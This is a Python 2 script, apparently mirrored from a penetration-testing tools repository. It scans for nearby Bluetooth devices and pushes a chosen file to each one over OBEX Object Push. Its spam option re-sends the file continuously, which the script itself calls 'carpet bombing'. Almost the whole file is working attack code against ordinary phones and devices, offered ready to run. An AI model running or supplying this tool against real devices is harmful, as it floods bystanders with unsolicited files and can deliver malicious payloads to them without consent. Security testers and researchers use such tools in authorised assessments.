mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2025-01-07 00:30:58 +01:00
102 lines
3.1 KiB
Python
102 lines
3.1 KiB
Python
#
|
|
# Bluetooth scanner with ability to spam devices
|
|
# with incoming OBEX Object Push requests containing
|
|
# specified file.
|
|
#
|
|
# Mariusz B. / MGeeky, 16'
|
|
#
|
|
# Partially based on `Violent Python` snippets.
|
|
# Modules required:
|
|
# python-bluez
|
|
# python-obexftp
|
|
#
|
|
import bluetooth
|
|
import scapy
|
|
import obexftp
|
|
import sys
|
|
import optparse
|
|
import threading
|
|
import time
|
|
import os
|
|
|
|
foundDevs = []
|
|
|
|
def printDev(name, dev, txt='Bluetooth device'):
|
|
print '[+] %s: "%s" (MAC: %s)' % (txt, name, dev)
|
|
|
|
def retBtAddr(addr):
|
|
btAddr = str(hex(int(addr.replace(':', ''), 16) + 1))[2:]
|
|
btAddr = btAddr[0:2] + ':' + btAddr[2:4] + ':' + btAddr[4:6] + \
|
|
':' + btAddr[6:8] + ':' + btAddr[8:10] + ':' + btAddr[10:12]
|
|
return btAddr
|
|
|
|
def checkBluetooth(btAddr):
|
|
btName = bluetooth.lookup_name(btAddr)
|
|
if btName:
|
|
printDev('Hidden Bluetooth device detected', btName, btAddr)
|
|
return True
|
|
|
|
return False
|
|
|
|
def sendFile(dev, filename):
|
|
if os.path.exists(filename):
|
|
client = obexftp.client(obexftp.BLUETOOTH)
|
|
channel = obexftp.browsebt(dev, obexftp.PUSH)
|
|
print '[>] Sending file to %s@%s' % (dev, str(channel))
|
|
client.connect(dev, channel)
|
|
ret = client.put_file(filename)
|
|
if int(ret) >= 1:
|
|
print '[>] File has been sent.'
|
|
else:
|
|
print '[!] File has not been accepted.'
|
|
client.disconnect()
|
|
else:
|
|
print '[!] Specified file: "%s" does not exists.'
|
|
|
|
def findDevs(opts):
|
|
global foundDevs
|
|
devList = bluetooth.discover_devices(lookup_names=True)
|
|
repeat = range(0, int(opts.repeat))
|
|
|
|
for (dev, name) in devList:
|
|
if dev not in foundDevs:
|
|
name = str(bluetooth.lookup_name(dev))
|
|
printDev(name, dev)
|
|
foundDevs.append(dev)
|
|
for i in repeat:
|
|
sendFile(dev, opts.file)
|
|
continue
|
|
|
|
if opts.spam:
|
|
for i in repeat:
|
|
sendFile(dev, opts.file)
|
|
|
|
def main():
|
|
parser = optparse.OptionParser(usage='Usage: %prog [options]')
|
|
parser.add_option('-f', '--file', dest='file', metavar='FILE', help='Specifies file to be sent to discovered devices.')
|
|
parser.add_option('-t', '--time', dest='time', metavar='TIMEOUT', help='Specifies scanning timeout (default - 0 secs).', default='0')
|
|
parser.add_option('-r', '--repeat', dest='repeat', metavar='REPEAT', help='Number of times to repeat file sending after finding a device (default - 1)', default='1')
|
|
parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly')
|
|
|
|
print '\nBluetooth file carpet bombing via OBEX Object Push'
|
|
print 'Mariusz B. / MGeeky 16\n'
|
|
|
|
(opts, args) = parser.parse_args()
|
|
|
|
if opts.file != '':
|
|
if not os.path.exists(opts.file):
|
|
print '[!] Specified file: "%s" does not exists.'
|
|
sys.exit(0)
|
|
|
|
print '[+] Started Bluetooth scanning. Ctr-C to stop...'
|
|
|
|
timeout = float(opts.time)
|
|
try:
|
|
while True:
|
|
findDevs(opts)
|
|
time.sleep(timeout)
|
|
except KeyboardInterrupt, e:
|
|
print '\n[?] User interruption.'
|
|
|
|
if __name__ == '__main__':
|
|
main() |